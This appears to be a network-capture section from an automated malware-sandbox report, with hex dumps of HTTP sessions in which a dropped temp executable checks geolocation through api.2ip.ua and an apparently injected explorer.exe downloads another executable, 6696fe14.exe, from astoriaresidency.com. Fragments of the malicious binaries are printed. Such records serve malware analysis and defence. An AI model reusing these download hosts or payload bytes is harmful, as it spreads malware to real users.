ed 12 8b f0 4f 5e 11 52 15 49 6d f3 dd d9 4b a5 98 b8 03 38 40 4c ab 9e a8 57 24 bd 09 fc 3d f3 a6 ce bb 28 9f 69 84 82 5e eb 84 ff 14 42 55 42 27 a9 e3 54 de 53 b9 66 c6 b0 92 9d f3 a5 41 13 93 Data Ascii: 2000~qyOY<+9<eP5_,jaV(#s$>Q>\|VTI&leUnUQL+W@lI0S!ckL$ShB7I]gj7]WB"+&-$ow,6PO^RImK8@LW$=(i^BUB'TSfA
2023-06-21 02:28:16 UTC	833	IN	Data Raw: f8 74 b7 09 5f 7d Data Ascii: t_}
2023-06-21 02:28:16 UTC	833	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	833	IN	Data Raw: 32 30 30 30 0d 0a 88 9a 8f a3 2f d2 76 e8 18 98 0a 54 0e 62 33 b9 87 c9 ec df 7b 3c ad 73 7c c6 1f 04 42 f8 24 de e9 ab 66 49 cf a5 a3 4c 75 be 8c 4b b4 4e b9 35 4b 03 6f c1 c0 fe 8f df 32 8b d9 7c a8 4f 15 fd 21 b3 46 22 36 43 92 c1 2a 37 f6 8d 8f 64 61 7d 8e b9 a1 2b a8 a8 62 f6 88 f8 01 ab 1b 01 79 12 ac 3e ce 28 a9 31 1a 14 62 c8 13 ce 66 a4 af 7d a2 10 27 be a3 d5 8a fe 82 f5 66 27 9d 3e 81 3a 80 1d 90 24 72 09 e0 87 ad bb 6f c4 5b 24 91 fe 57 77 76 b9 92 05 dc ee 94 80 24 e6 d6 e3 29 57 7f 05 20 dc a5 f5 78 46 1c ae 03 08 db 6d 2d 6b c8 07 74 db 26 89 dd 51 b8 ba b6 8e 24 7f 55 5a 41 97 a5 4a 53 30 7a e5 f3 77 70 1d 62 e6 ec 88 18 61 21 67 ec a7 a5 2b 2d c2 f4 8c b2 74 01 7f 7d 20 e3 da c5 ef 1d 3b 3e 9a 51 6e 1b ba 61 01 05 56 c5 de 9d cb d7 37 9b Data Ascii: 2000/vTb3{<s\|B$fILuKN5Ko2\|O!F"6C*7da}+by>(1bf}'f'>:$ro[$Wwv$)W xFm-kt&Q$UZAJS0zwpba!g+-t} ;>QnaV7
2023-06-21 02:28:16 UTC	841	IN	Data Raw: cd a8 32 b8 f4 ea Data Ascii: 2
2023-06-21 02:28:16 UTC	841	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	841	IN	Data Raw: 32 30 30 30 0d 0a db 31 18 17 59 e8 70 ac 24 61 f0 fb 8c 66 9b 3d ac a4 59 34 e9 24 b0 dc 80 6e ea 49 35 b5 ad 5d d5 05 21 bf ec 85 0d 7a 27 98 a8 0f f4 c5 ff 41 80 c3 c3 4b fa f0 c5 c0 32 34 06 11 3b ee 48 57 5e 80 8a e8 47 c2 eb 9c ff 4d 27 27 e7 d1 ba f2 0e a3 f5 b0 d1 64 ec ae 7e 40 6f 12 99 1f fb 9b cd a5 0d 4a 43 dd 49 5a b3 2d 7d ae 07 a5 45 da e0 15 4d bb 8d 70 43 5e 21 67 8f 73 da 6f 35 5b 36 49 34 92 60 c9 9d 1d 26 c9 a0 a1 b6 7c f2 82 0f c1 21 db d1 ec 4f 1b ca b0 10 90 18 ff 71 fa c7 bf 9a 96 85 e8 32 df 51 77 9b c5 f3 d2 93 34 a5 7f b5 77 08 7c 40 94 21 c5 1e 82 c9 5c 49 44 a4 f6 d4 d2 b2 ec 1a f9 0d 93 f5 4e 48 44 5c 40 1f 8a 73 50 5a 22 d1 fb b8 25 cc f5 da f7 e6 1c 28 42 40 f9 71 ef 39 ee 24 ec c8 d8 e8 df 6a 2e 1b 18 76 38 50 44 01 a6 2f Data Ascii: 20001Yp$af=Y4$nI5]!z'AK24;HW^GM''d~@oJCIZ-}EMpC^!gso5[6I4`&\|!Oq2Qw4w\|@!\IDNHD\@sPZ"%(B@q9$j.v8PD/
2023-06-21 02:28:16 UTC	849	IN	Data Raw: cb 0f 19 7c e1 35 Data Ascii: \|5
2023-06-21 02:28:16 UTC	849	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	849	IN	Data Raw: 32 30 30 30 0d 0a 9d bb 51 ae 04 e7 83 b7 16 b2 35 df 25 ed 4f ee b5 bc 90 c2 9e fd 0a c5 ab 27 b4 bc 9c 50 98 a7 96 dd 5a 1c 03 87 59 81 57 02 04 b8 85 57 49 e7 2e d7 96 d8 c7 64 3d a0 fe 06 51 31 84 e3 3b 97 d9 37 e8 59 e6 35 72 ff 11 31 d9 4b dc 5f b1 88 77 9e 4c 78 a0 2d c0 b6 5a 8b 32 46 cc a9 ab 0c 00 06 3d db 29 76 84 08 dc 00 cf 48 db 8e 08 c6 e0 53 51 18 dd 3b f9 c8 9a 5c 9b 62 8a 6e 97 57 52 13 79 6d e6 5d e2 08 4c f1 e6 bb 76 44 85 19 c6 49 73 1a 03 86 69 73 8b 08 7a ca df 37 d4 82 7e 1e d4 99 e4 93 a0 2b 88 bc d5 47 07 08 f9 de 47 40 cb a6 f4 f4 0a 30 14 e1 9d e6 cd 56 aa 2b 29 90 44 2d 03 7f 99 77 78 84 0a e6 2f 3f 69 17 87 20 85 36 52 e2 87 01 91 32 e8 4b d4 4a 82 37 0e 8e 8e aa ee 52 5e ae fa 17 b9 23 77 58 ca 2b cf a7 31 77 03 12 77 2b c6 Data Ascii: 2000Q5%O'PZYWWI.d=Q1;7Y5r1K_wLx-Z2F=)vHSQ;\bnWRym]LvDIsisz7~+GG@0V+)D-wx/?i 6R2KJ7R^#wX+1ww+
2023-06-21 02:28:16 UTC	857	IN	Data Raw: 4d 4a 21 b3 42 d3 Data Ascii: MJ!B
2023-06-21 02:28:16 UTC	857	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	857	IN	Data Raw: 32 30 30 30 0d 0a 48 56 29 05 70 53 e7 22 33 ac 06 1b 27 cc 71 12 b2 e1 0b 7b bd 1a f2 53 a4 96 5d 59 cc 23 60 07 2e 74 d5 a7 86 cf f3 73 7a 6e ee b0 6b d3 e6 8e 2d 6a fb 0d b0 13 03 cc 3c f9 e4 76 7f 1b b2 7b 52 39 5c fe fd 98 fc 6e 1c 97 71 73 20 5e 37 6b 56 61 57 df 0e 9e 6c 7a 00 31 b2 87 52 db 71 86 ca f5 c9 e4 36 dc 45 89 7f a8 87 cf b2 e8 de f4 23 31 97 39 18 44 db d5 31 fc 2f 6c a5 52 02 7e a9 cc 0e 14 8e d4 95 39 16 22 5a 19 08 9a 83 39 da 57 df eb 98 c9 cb 77 ac 60 68 79 c1 3f 5b dd 8b 8c cd ed 26 e4 94 ad 2b a1 94 c8 ce 93 78 d1 15 b9 03 13 bb 0d 6d 47 ff 79 45 77 70 ef d4 bd 3a 1b 99 78 04 4a d2 bc c1 5f 60 98 b1 18 ed 45 c1 e0 aa 1c 3b 8d 6c 43 11 c5 9b ab d1 43 21 0b 1d 39 ac c4 86 0e 9b 57 e9 b2 ab 69 95 66 68 95 bb 85 0d d6 50 bd bd 23 34 Data Ascii: 2000HV)pS"3'q{S]Y#`.tsznk-j<v{R9\nqs ^7kVaWlz1Rq6E#19D1/lR~9"Z9Ww`hy?[&+xmGyEwp:xJ_`E;lCC!9WifhP#4
2023-06-21 02:28:16 UTC	865	IN	Data Raw: a5 92 f4 cc f4 ca Data Ascii:
2023-06-21 02:28:16 UTC	865	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	865	IN	Data Raw: 32 30 30 30 0d 0a 50 00 33 64 b0 be 95 70 d0 28 34 53 bf 56 a7 c3 09 db 90 43 ed 9b ff 10 1a 72 34 a5 d3 ad cd f3 b2 a8 1d bd 9f b0 ff ad 0a 9a fc f3 9a 59 06 d1 5e 61 77 24 09 b2 d8 de 0e 54 85 6b 1c 2e 2e 33 73 e3 5e a9 35 68 58 62 a6 c4 d2 a4 a1 12 d8 4e 8d f4 10 e2 a2 ec 96 d3 d1 56 18 f8 35 21 37 58 97 31 07 d6 39 36 c1 ed 1e d8 69 67 d1 c5 75 84 66 06 18 55 c2 d1 b4 14 2e 0b 1f ea 86 bf da f2 d8 66 f0 5e ca 59 20 4f fb ca 4f 86 89 d1 8b b3 cc 7d 1d 83 99 a5 9d e2 05 77 41 55 99 74 49 18 49 9c 13 cf f1 98 d0 59 ff 58 34 3a 85 a1 1a 6c 9f 47 6f 70 1c ee 2b 62 92 17 56 59 52 62 66 5e 29 0b d6 64 fc fe a4 1d 45 13 80 9f 44 13 f1 b5 44 3d f0 e8 55 75 f9 da 36 10 3f fe 61 d2 73 ac ff c2 eb cb c5 92 0c 24 b8 a8 26 15 99 94 71 f3 44 04 e6 af e4 be 84 11 c5 Data Ascii: 2000P3dp(4SVCr4Y^aw$Tk..3s^5hXbNV5!7X196igufU.f^Y OO}wAUtIIYX4:lGop+bVYRbf^)dEDD=Uu6?as$&qD
2023-06-21 02:28:16 UTC	873	IN	Data Raw: 54 bd c1 5b cc 44 Data Ascii: T[D
2023-06-21 02:28:16 UTC	873	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	873	IN	Data Raw: 31 66 66 38 0d 0a 06 d8 1e 10 f6 90 54 b4 49 de 83 1f b1 86 47 cf f6 97 66 54 1e 4c ec 20 06 d8 89 05 37 4c 67 5a 9f 38 f2 4d c0 e2 68 9f 2b ce 70 4d 23 f5 cc 16 df 67 81 26 e4 3e 19 cd e7 1e 05 b5 3d 7a d6 12 90 64 37 98 ee 1a cd 26 2b a3 47 4a 2f c5 ab a0 19 46 39 d1 d6 e5 82 18 42 db 02 ca a6 8b 8d 14 81 55 4e 0b 8f 0f 11 eb 75 f2 0b 5b 4c 07 cf cd 5c 1e 10 70 bb 4d 1e cd 30 d9 de 6f eb 0e 13 cf ce 97 1e 5d 3c d3 e3 2b 9b a8 37 9d 86 09 36 3f b4 df 6f 4d 74 2f 53 b8 73 3e 57 0a cf a2 59 b6 d0 fe 76 55 93 a6 00 3b d1 81 ba 57 9b 87 5b 8d b7 03 df 5f 29 f2 b2 14 d9 ab d4 c8 6c 85 92 be 18 f8 24 4c 7a a4 72 7f 1d c2 44 64 24 fc b0 82 29 13 99 a3 21 9f 3c e2 fc ff 87 3e fd 29 72 8a 21 e0 37 f7 34 8f 1e 7e 3e 3b 75 d0 32 1b 9d 50 b3 bd 39 b6 2e a2 a6 64 f8 Data Ascii: 1ff8TIGfTL 7LgZ8Mh+pM#g&>=zd7&+GJ/F9BUNu[L\pM0o]<+76?oMt/Ss>WYvU;W[_)l$LzrDd$)!<>)r!74~>;u2P9.d
2023-06-21 02:28:16 UTC	881	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:16 UTC	881	IN	Data Raw: 0a 00 00 00 07 00 00 00 0b 00 00 00 08 00 00 00 0c 00 00 00 16 00 00 00 0d 00 00 00 16 00 00 00 0f 00 00 00 02 00 00 00 10 00 00 00 0d 00 00 00 11 00 00 00 12 00 00 00 12 00 00 00 02 00 00 00 21 00 00 00 0d 00 00 00 35 00 00 00 02 00 00 00 41 00 00 00 0d 00 00 00 43 00 00 00 02 00 00 00 50 00 00 00 11 00 00 00 52 00 00 00 0d 00 00 00 53 00 00 00 0d 00 00 00 57 00 00 00 16 00 00 00 59 00 00 00 0b 00 00 00 6c 00 00 00 0d 00 00 00 6d 00 00 00 20 00 00 00 70 00 00 00 1c 00 00 00 72 00 00 00 09 00 00 00 06 00 00 00 16 00 00 00 80 00 00 00 0a 00 00 00 81 00 00 00 0a 00 00 00 82 00 00 00 09 00 00 00 83 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 91 00 00 00 29 00 00 00 9e 00 00 00 0d 00 00 00 a1 00 00 00 02 00 00 00 a4 00 00 00 0b 00 00 00 a7 00 00 00 0d 00 00 Data Ascii: !5ACPRSWYlm pr)
2023-06-21 02:28:16 UTC	889	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	889	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:28:16 UTC	897	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:28:16 UTC	897	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	897	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 01 00 00 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 4a 04 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 b8 02 00 00 40 64 10 00 19 07 00 00 00 00 00 00 00 00 00 00 e0 02 10 00 a8 0e 00 00 00 00 00 00 00 00 00 00 88 11 10 00 a8 08 00 00 00 00 00 00 00 00 00 00 30 1a 10 00 68 05 00 00 00 00 00 00 00 00 00 00 98 1f 10 00 a8 25 00 00 00 00 00 00 00 00 00 00 40 45 10 00 a8 10 00 00 00 00 00 00 00 00 00 00 e8 55 10 00 88 09 00 00 00 00 00 00 00 00 00 00 70 5f 10 00 68 04 00 00 00 00 00 00 00 00 00 00 68 6d 10 00 f0 04 00 00 00 00 00 00 00 00 00 00 58 72 10 00 4a 08 00 00 00 00 00 00 00 00 00 00 d8 63 10 00 68 00 00 00 00 00 00 00 00 00 00 00 60 6b 10 00 04 02 00 00 00 Data Ascii: 2000J@d0h%@EUp_hhmXrJch`k
2023-06-21 02:28:16 UTC	905	IN	Data Raw: 83 82 85 83 84 80 Data Ascii:
2023-06-21 02:28:16 UTC	905	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	905	IN	Data Raw: 32 30 30 30 0d 0a 7e 82 7d 7b 7e 85 7e 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 7c 7d 81 82 81 7e 83 7d 7a 7b 82 7f 85 84 7d 86 7e 7d 7f 80 7a 7b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000~}{~~}\|}~}z{}~}z{y
2023-06-21 02:28:16 UTC	913	IN	Data Raw: 81 7f 80 83 83 7d Data Ascii: }
2023-06-21 02:28:16 UTC	913	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	913	IN	Data Raw: 32 30 30 30 0d 0a 81 7b 80 7a 80 82 7f 82 7d 81 7d 84 7b 81 84 7d 7e 7c 7c 81 83 82 83 83 81 7c 82 7e 7d 7b 7d 82 7d 81 81 7f 7d 81 7a 7e 80 86 7f 81 80 7a 7c 7d 7c 7c 7b 7f 80 7c 83 79 7e 80 7e 83 84 7d 7c 7d 7f 7b 85 7e 83 81 80 7e 7b 81 80 7d 7e 7e 7f 7b 7d 7f 7b 80 83 81 81 7f 81 81 85 82 83 80 84 7d 84 81 83 7f 80 82 84 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 7f 7a 84 85 79 83 80 83 80 7b 7f 85 83 7f 7d 7e 83 7e 7f 84 7c 83 83 83 7d 84 7c 80 80 7f 7d 82 7f 81 81 82 81 85 7f 80 80 80 83 7a 7e 84 84 7e 80 7b 83 7f 7d 7b 7f 7b 7b 7d 81 7d 84 7e 82 84 7a 7c 81 7e 7e 7e 7b 7c 85 80 7e 7a 81 82 85 7b 82 83 85 83 82 7d 82 85 7c 81 7e 7a 7b 7d 7f 83 84 81 7e 80 7f 7d 82 80 81 83 7f 81 83 7f 7c 7c 7b 7b 7d 84 85 86 7f 84 7e 7e 82 80 80 7f 81 82 Data Ascii: 2000{z}}{}~\|\|\|~}{}}}z~z\|}\|\|{\|y~~}\|}{~~{}~~{}{}{zy{}~~\|}\|}z~~{}{{{}}~z\|~~~{\|~z{}\|~z{}~}\|\|{{}~~
2023-06-21 02:28:16 UTC	921	IN	Data Raw: 82 7f 7f 83 80 82 Data Ascii:
2023-06-21 02:28:16 UTC	921	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	921	IN	Data Raw: 32 30 30 30 0d 0a 7e 7a 7f 86 7f 80 83 85 00 00 00 00 00 00 00 00 80 7d 7e 81 7e 7e 80 7f 7c 7e 7f 81 7f 85 82 85 7b 7f 7b 7c 84 79 7a 85 7d 7c 84 7f 7e 81 80 7f 84 81 82 7d 79 7b 7d 80 7d 81 82 7d 80 7d 7b 83 7f 7e 7f 80 7d 86 80 7c 83 7d 7d 7f 00 00 00 00 81 84 80 80 7c 80 80 83 83 7c 7b 80 7e 7b 7b 7a 7e 7e 7c 81 80 83 7b 80 7e 7d 85 85 85 7b 82 82 80 81 7d 7b 83 83 84 7a 7a 79 7f 7a 81 81 7e 80 7e 85 7f 7f 7c 7b 83 80 80 7f 80 7b 00 00 00 00 80 81 7d 7b 84 80 7b 82 7d 83 82 7a 7f 7e 81 7f 7d 84 84 7e 7a 80 7c 83 84 82 82 7f 7f 7f 81 7f 80 82 7f 83 7f 7f 80 7c 80 80 82 7c 81 81 80 84 7f 82 84 81 7d 7e 80 80 84 7e 83 83 00 00 00 00 82 80 7f 7f 7f 80 7c 84 7d 80 7d 7f 81 7e 83 7c 80 7c 80 7c 85 85 82 81 84 7c 85 7a 7d 7b 83 80 7e 82 82 7c 81 7c 7d 7f 81 Data Ascii: 2000~z}~~~\|~{{\|yz}\|~}y{}}}}{~}\|}}\|\|{~{{z~~\|{~}{}{zzyz~~\|{{}{{}z~}~z\|\|\|}~~\|}}~\|\|\|\|z}{~\|\|}
2023-06-21 02:28:16 UTC	929	IN	Data Raw: e0 3b e6 3b 02 3c Data Ascii: ;;<
2023-06-21 02:28:16 UTC	929	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	929	IN	Data Raw: 31 65 33 38 0d 0a 35 3c 3e 3c 4a 3c 81 3c 8a 3c 96 3c cf 3c d8 3c e4 3c fd 3c 35 3d 78 3d 7e 3d ab 3d b4 3d e1 3d fc 3d 02 3e 0b 3e 12 3e 34 3e 93 3e 9b 3e ae 3e b9 3e be 3e ce 3e d8 3e df 3e ea 3e f3 3e 09 3f 14 3f 2e 3f 3a 3f 42 3f 52 3f 67 3f a7 3f b4 3f de 3f e3 3f ee 3f f3 3f 00 90 00 00 e4 00 00 00 11 30 c2 30 cf 30 d9 30 f6 30 52 31 2c 32 34 32 4c 32 64 32 bb 32 cd 32 d3 32 ed 32 fc 32 09 33 15 33 25 33 2c 33 3b 33 47 33 54 33 78 33 8a 33 98 33 ad 33 b7 33 dd 33 10 34 1f 34 28 34 4c 34 7b 34 bd 34 cf 34 54 35 68 35 89 35 8f 35 c1 35 18 36 20 36 60 36 6a 36 92 36 ab 36 ec 36 1c 37 2e 37 80 37 86 37 00 38 8a 38 bf 38 d8 38 df 38 e7 38 ec 38 f0 38 f4 38 1d 39 43 39 61 39 68 39 6c 39 70 39 74 39 78 39 7c 39 80 39 84 39 ce 39 d4 39 d8 39 dc 39 e0 39 46 Data Ascii: 1e385<><J<<<<<<<<5=x=~=====>>>4>>>>>>>>>>>??.?:?B?R?g???????00000R1,242L2d22222233%3,3;3G3T3x33333344(4L4{444T5h55556 6`6j66667.7778888888889C9a9h9l9p9t9x9\|99999999F

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49749	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:18 UTC	936	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:18 UTC	936	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:18 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:18 UTC	937	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49755	103.233.24.19	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:20 UTC	937	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: astoriaresidency.com
2023-06-21 02:28:21 UTC	938	IN	HTTP/1.1 200 OK Date: Wed, 21 Jun 2023 02:28:21 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=6696fe14.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-06-21 02:28:21 UTC	938	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$Giiii3iei$>ihiiiiRichiPELK
2023-06-21 02:28:21 UTC	946	IN	Data Raw: 84 29 40 00 80 29 40 00 7c 29 40 00 78 29 40 00 74 29 40 00 70 29 40 00 6c 29 40 00 68 29 40 00 64 29 40 00 60 29 40 00 5c 29 40 00 58 29 40 00 54 29 40 00 50 29 40 00 4c 29 40 00 48 29 40 00 44 29 40 00 40 29 40 00 3c 29 40 00 38 29 40 00 34 29 40 00 30 29 40 00 2c 29 40 00 28 29 40 00 24 29 40 00 20 29 40 00 1c 29 40 00 18 29 40 00 14 29 40 00 08 29 40 00 fc 28 40 00 f4 28 40 00 e8 28 40 00 d0 28 40 00 c4 28 40 00 b0 28 40 00 90 28 40 00 70 28 40 00 50 28 40 00 30 28 40 00 10 28 40 00 ec 27 40 00 d0 27 40 00 ac 27 40 00 8c 27 40 00 64 27 40 00 48 27 40 00 38 27 40 00 34 27 40 00 2c 27 40 00 1c 27 40 00 f8 26 40 00 f0 26 40 00 e4 26 40 00 d4 26 40 00 b8 26 40 00 98 26 40 00 70 26 40 00 48 26 40 00 20 26 40 00 f4 25 40 00 d8 25 40 00 b4 25 40 00 90 25 40 Data Ascii: )@)@\|)@x)@t)@p)@l)@h)@d)@`)@\)@X)@T)@P)@L)@H)@D)@@)@<)@8)@4)@0)@,)@()@$)@ )@)@)@)@)@(@(@(@(@(@(@(@p(@P(@0(@(@'@'@'@'@d'@H'@8'@4'@,'@'@&@&@&@&@&@&@p&@H&@ &@%@%@%@%@
2023-06-21 02:28:21 UTC	946	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	946	IN	Data Raw: 32 30 30 30 0d 0a 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6e 00 61 00 67 00 65 00 79 00 65 00 76 00 65 00 7a 00 75 00 73 00 61 00 20 00 6e 00 61 00 68 00 69 00 76 00 6f 00 68 00 65 00 78 00 69 00 70 00 65 00 6d 00 65 00 6a 00 65 00 6e 00 61 00 72 00 20 00 67 00 6f 00 62 00 6f 00 6e 00 65 00 7a 00 6f 00 78 00 69 00 77 00 75 00 6c 00 6f 00 79 00 69 00 6c 00 61 00 6b 00 69 00 64 00 69 00 72 00 65 00 77 00 69 00 6a 00 75 00 76 00 65 00 74 00 69 Data Ascii: 2000eWindowMessageBoxAUSER32.DLLSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$bad allocationnageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti
2023-06-21 02:28:21 UTC	954	IN	Data Raw: 06 70 12 40 00 74 Data Ascii: p@t
2023-06-21 02:28:21 UTC	954	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	954	IN	Data Raw: 32 30 30 30 0d 0a 07 56 e8 61 0d 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 ee ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 13 ff ff ff 68 68 a0 42 00 e8 c5 ff ff ff 83 25 68 a0 42 00 00 59 8d 4d fc e8 21 ff ff ff c9 c3 a1 68 a0 42 00 c3 8b ff 55 8b ec 80 3d 8c a0 42 00 00 75 12 68 30 4c 40 00 c6 05 8c a0 42 00 01 e8 18 06 00 00 59 8b 45 08 a3 68 a0 42 00 5d c3 6a 04 b8 d8 3b 42 00 e8 58 23 00 00 6a 00 8d 4d f0 e8 b1 fe ff ff 8b 7d 08 83 65 fc 00 8b 77 0c eb 1f 8b 47 08 4e 8d 04 b0 83 38 00 74 13 8b 08 e8 4f ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 85 f6 77 dd ff 77 08 e8 86 1e 00 00 83 4d fc ff 59 8d 4d f0 e8 95 fe ff ff e8 6e 23 00 00 c3 8b ff 55 8b ec 83 7d 08 00 56 74 2b 8b Data Ascii: 